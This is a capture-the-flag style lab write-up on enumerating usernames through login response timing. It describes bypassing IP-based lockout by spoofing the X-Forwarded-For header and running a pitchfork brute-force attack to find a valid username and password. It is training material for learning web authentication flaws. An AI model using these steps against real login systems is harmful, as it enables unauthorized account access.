Username enumeration via response timing

This lab has increased difficulty compared to the other two. The first thing to notice is that it implements a form of IP-based brute-force protection. In the lab description it says this can be easily bypassed by manipulating HTTP request headers.

The hints section mentions the "X-Forwarded-For" HTTP header. A quick google-fu and we can find some definition of it.

Once we do some unsuccessful login attempts the login is blocked for 30 min.

So lets try to spoof our IP address the "X-Forwarded-For" header by sending the request to the repeater.

Using this header and setting it to one managed to spoofed our IP address, and we are not blocked anymore.

Also, by using repeater with a correct username ("wiener") and different length passwords, we can see that the response time increases the bigger the password we are using.

The next step is to send the request to intruder to perform the brute-force attack, but this time we need two payloads: one to increase the value of the "X-Forwareded-For" header, and one with the usernames dictionary. To do this, instead of the sniper attack type we need to use the pitchfork attack.

For the first payload we will use the "numbers" payload type, to increment the header by 1 each iteration. Since the usernames list only has 100 usernames, we only need to increment it 100 times.

The second payload will be a simple list, like the one used in the previous labs.

To see which username is the correct one, we need to check the response times. To do that, we can click (in the attack window) "Columns" and select the "Response received" and "Response completed". In this case, the response time for the username "guest" was significantly longer than the other ones, so we can try to brute-force with the passwords wordlist to find the "302" response.

Using this password we can complete the lab.